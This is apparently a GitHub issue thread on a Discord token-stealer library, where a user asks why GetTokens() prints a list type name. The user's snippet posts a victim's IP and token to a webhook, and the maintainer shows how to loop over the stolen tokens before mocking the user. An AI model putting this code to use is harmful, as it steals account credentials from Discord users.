### ISSUE TITLE
System.Collections.Generic.List`1[System.String]

### ISSUE THREAD

**Issue by Zordon1337** [MoistCoder/DiscordGrabber#1]
when i'm trying to use ``var token = DiscordGrabber.GetTokens();`` i get ``System.Collections.Generic.List`1[System.String]`` instead of token

**Comment by MoistCoder** [comment]
What you are saying makes no sense. When calling the method `GetTokens()` you should get **nothing** as it doesn't access your output. You probably just used `DiscordGrabber.GetTokens().ToString()` which resulted in your output is that right?

**Comment by Zordon1337** [comment]
i used
```
var token = DiscordGrabber.GetTokens();

dcWeb.SendMessage("IP: " + data2 + "\ntoken: " + token);
```

i want to know how to get token to string

**Comment by MoistCoder** [comment]
GetTokens()'s return type is `List<string>`. Lists are basic knowledge, so I assume you're a skid, but anyway:
You will need to loop through the list to get all values (like in the example I provided in the [Readme](https://github.com/MoistCoder/DiscordGrabber/blob/main/README.md)):

> ```cs
> foreach (string token in DiscordGrabber.GetTokens()) Console.WriteLine(token);
> ```

You can also use a `for` or `while` loop

**Comment by Zordon1337** [comment]
i'm not skid but sometimes i'm using someone src. most of my project are coded by me. i still don't have idea how to fix.
after using foreach it doesn't anymore sends the webhook

**Comment by MoistCoder** [comment]
> i'm not skid but sometimes i'm using someone src.

That is a blatant lie. Every C# developer knows what lists are and how loops work.

> i still don't have idea how to fix.
> after using foreach it doesn't anymore sends the webhook

Hahaha, you probably just copied the example into your code LMAO. Whatever kid don't waste my time. I know you just searched for a discord token stealer to modify a small amount of its code so you can claim it as yours. You don't know C# let alone English. I'm not gonna help skids.

**Comment by Zordon1337** [comment]
Yeah, after learning C# i agree, i was an skid lol
